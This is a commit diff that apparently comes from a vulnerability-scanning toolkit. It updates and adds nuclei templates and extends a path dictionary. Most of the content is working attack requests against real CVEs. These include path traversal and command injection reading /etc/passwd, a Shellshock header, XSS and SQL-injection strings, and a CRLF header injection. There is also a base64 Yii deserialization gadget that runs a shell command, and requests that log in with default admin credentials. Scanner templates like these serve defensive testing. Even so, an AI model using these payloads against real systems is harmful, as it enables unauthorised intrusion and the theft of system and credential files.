up PoCs 2022-09-29

brute/dicts/filedic.txt

@@ -1,3 +1,4 @@
+/_wpeprivate/config.json
 /bea_wls_internal/classes/mejb@/org/omg/stub/javax/management/j2ee/_ManagementHome_Stub.class
 !.gitignore
 !.htaccess

config/nuclei-templates/51pwn/pay001.yaml

@@ -222,9 +222,9 @@ requests:
         - "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
         - "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00"
         - "cgi-bin/faxsurvey?cat%20/etc/passwd"
-        - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
-        - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
-        - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
+        - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
+        - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
+        - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
         - "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
         - "cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|"
         - "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
@@ -280,7 +280,7 @@ requests:
         - "cgi-bin/viewsource?/etc/passwd"
         - "cgi-bin/way-board.cgi?db=/etc/passwd%00"
         - "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00"
-        - "cgi-bin/webbbs/webbbs_config.pl?name=joe&email=testnmanp@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
+        - "cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
         - "cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
         - "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd"
         - "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
@@ -319,9 +319,9 @@ requests:
         - "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
         - "faqmanager.cgi?toc=/etc/passwd%00"
         - "faxsurvey?cat%20/etc/passwd"
-        - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
-        - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
-        - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
+        - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
+        - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
+        - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
         - "forum-ra.asp?n=../../../../../../../../../etc/passwd"
         - "forum-ra.asp?n=../../../../../../../../../etc/passwd%00"
         - "forum-ra.asp?n=/etc/passwd"
@@ -486,7 +486,7 @@ requests:
         - "way-board.cgi?db=/etc/passwd%00"
         - "way-board/way-board.cgi?db=/etc/passwd%00"
         - "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif"
-        - "webbbs/webbbs_config.pl?name=joe&email=testnmanp@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
+        - "webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
         - "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd"
         - "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
         - "webdist.cgi?distloc=;cat%20/etc/passwd"

config/nuclei-templates/51pwn/wpeprivate_leak.yaml

@@ -0,0 +1,28 @@
+id: wpeprivate_leak
+
+info:
+  name: wpeprivate_leak
+  author: 51pwn
+  severity: critical
+  description: |
+    wpeprivate_leak
+  metadata:
+  tags: leak,config
+
+requests:
+  - method: GET
+    path: 
+      - "{{BaseURL}}/_wpeprivate/config.json"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+        - 200
+      - type: word
+        part: body
+        words:
+          - '"VPENGINE_PHPSESSIONS":'
+
+
+# Enhanced by mp on 2022/09/29

config/nuclei-templates/cves/2007/CVE-2007-5728.yaml

@@ -20,7 +20,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=testnmanp'
+      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2012/CVE-2012-3153.yaml

@@ -21,7 +21,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/reports/rwservlet/showenv"
-      - "{{BaseURL}}/reports/rwservlet?report=testnmanp.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
+      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
 
     req-condition: true
     matchers-condition: and

config/nuclei-templates/cves/2014/CVE-2014-4558.yaml

@@ -4,7 +4,7 @@ info:
   name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: A cross-site scripting vulnerability in testnmanp-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
+  description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
   reference:
     - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4558
@@ -19,7 +19,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/testnmanp-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
+      - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2014/CVE-2014-6271.yaml

@@ -23,11 +23,11 @@ requests:
       - "{{BaseURL}}"
       - "{{BaseURL}}/cgi-bin/status"
       - "{{BaseURL}}/cgi-bin/stats"
-      - "{{BaseURL}}/cgi-bin/testnmanp"
+      - "{{BaseURL}}/cgi-bin/test"
       - "{{BaseURL}}/cgi-bin/status/status.cgi"
-      - "{{BaseURL}}/testnmanp.cgi"
+      - "{{BaseURL}}/test.cgi"
       - "{{BaseURL}}/debug.cgi"
-      - "{{BaseURL}}/cgi-bin/testnmanp-cgi"
+      - "{{BaseURL}}/cgi-bin/test-cgi"
 
     headers:
       Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

config/nuclei-templates/cves/2016/CVE-2016-4977.yaml

@@ -21,7 +21,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testnmanp"
+      - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2017/CVE-2017-17736.yaml

@@ -0,0 +1,41 @@
+id: CVE-2017-17736
+
+info:
+  name: Kentico - Unauthenticated Administration Dashboard
+  author: shiar
+  severity: critical
+  description: |
+    Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 allows remote attackers to obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.
+  reference:
+    - https://www.exploit-db.com/ghdb/5694
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-17736
+    - https://blog.hivint.com/advisory-access-control-bypass-in-kentico-cms-cve-2017-17736-49e1e43ae55b
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2017-17736
+    cwe-id: CWE-425
+  metadata:
+    google-dork: intitle:"kentico database setup"
+    verified: "true"
+  tags: cve,cve2017,kentico,cms,install,rce,unauth,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/CMSInstall/install.aspx"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "Kentico"
+          - "Database Setup"
+          - "SQLServer"
+        condition: and
+
+      - type: word
+        words:
+          - "Database Setup"
+          - "SQLServer"
+        condition: and

config/nuclei-templates/cves/2018/CVE-2018-12300.yaml

@@ -19,7 +19,7 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/echo-server.html?code=testnmanp&state=http://www.interact.sh#'
+      - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
 
     matchers:
       - type: regex

config/nuclei-templates/cves/2018/CVE-2018-12613.yaml

@@ -4,7 +4,7 @@ info:
   name: PhpMyAdmin <4.8.2 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper testnmanp for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
+  description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
   reference:
     - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
     - https://www.phpmyadmin.net/security/PMASA-2018-4/

config/nuclei-templates/cves/2019/CVE-2019-3799.yaml

@@ -20,7 +20,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/testnmanp/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
+      - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
     matchers-condition: and
     matchers:
       - type: status

config/nuclei-templates/cves/2019/CVE-2019-8086.yaml

@@ -0,0 +1,53 @@
+id: CVE-2019-8086
+
+info:
+  name: Adobe Experience Manager XXE
+  author: DhiyaneshDk
+  severity: high
+  description: Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure.
+  reference:
+    - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
+    - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-8086
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: cve,cve2019,aem,adobe
+
+requests:
+  - raw:
+      - |
+        POST /content/{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Referer: {{BaseURL}}
+
+        sling:resourceType=fd/af/components/guideContainer
+
+      - |
+        POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Referer: {{BaseURL}}
+
+        guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<afData>ABC<afBoundData/>'
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2020/CVE-2020-13483.yaml

@@ -20,7 +20,7 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
-      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(testnmanp)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
+      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
 
     stop-at-first-match: true
     matchers-condition: and
@@ -30,7 +30,7 @@ requests:
         part: body
         words:
           - '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
-          - "function(handler){};function __MobileAppList(testnmanp){alert(document.domain);};//</div>"
+          - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
         condition: or
 
       - type: word

config/nuclei-templates/cves/2020/CVE-2020-15148.yaml

@@ -21,7 +21,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?r=testnmanp/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
+      - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2020/CVE-2020-17518.yaml

@@ -41,6 +41,6 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body, "testnmanp-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
+          - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
 
 # Enhanced by mp on 2022/07/13

config/nuclei-templates/cves/2020/CVE-2020-9344.yaml

@@ -25,7 +25,7 @@ requests:
       - '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
       - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'
       - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
-      - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=testnmanp'
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'
       - '{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2021/CVE-2021-27132.yaml

@@ -19,7 +19,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/testnmanp.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
+      - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
 
     matchers-condition: and
     matchers:
@@ -30,7 +30,7 @@ requests:
 
       - type: word
         words:
-          - "Content-Disposition: attachment;filename=testnmanp.txt"
+          - "Content-Disposition: attachment;filename=test.txt"
           - "Set-Cookie:CRLFInjection=Test"
           - "Location: interact.sh"
           - "X-XSS-Protection:0"

config/nuclei-templates/cves/2021/CVE-2021-31589.yaml

@@ -24,7 +24,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=testnmanp%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"
+      - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2021/CVE-2021-32789.yaml

@@ -22,13 +22,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-testnmanp%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
+      - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - 'sqli-testnmanp'
+          - 'sqli-test'
           - 'attribute_counts'
           - 'price_range'
           - 'term'

config/nuclei-templates/cves/2021/CVE-2021-34473.yaml

@@ -21,8 +21,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/autodiscover/autodiscover.json?@testnmanp.com/owa/?&Email=autodiscover/autodiscover.json%3F@testnmanp.com'
-      - '{{BaseURL}}/autodiscover/autodiscover.json?@testnmanp.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@testnmanp.com'
+      - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
+      - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
 
     matchers:
       - type: word

config/nuclei-templates/cves/2021/CVE-2021-36873.yaml

@@ -51,7 +51,7 @@ requests:
         dsl:
           - contains(all_headers_4, "text/html")
           - status_code_4 == 200
-          - contains(body_4, 'blockcountry_blockmessage\">testnmanp</textarea><script>alert(document.domain)</script>')
+          - contains(body_4, 'blockcountry_blockmessage\">test</textarea><script>alert(document.domain)</script>')
           - contains(body_4, '<h3>Block type</h3>')
         condition: and
 

config/nuclei-templates/cves/2021/CVE-2021-41569.yaml

@@ -19,7 +19,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=testnmanp&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=testnmanp&bgtype=COLOR"
+      - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"
 
     matchers-condition: and
     matchers: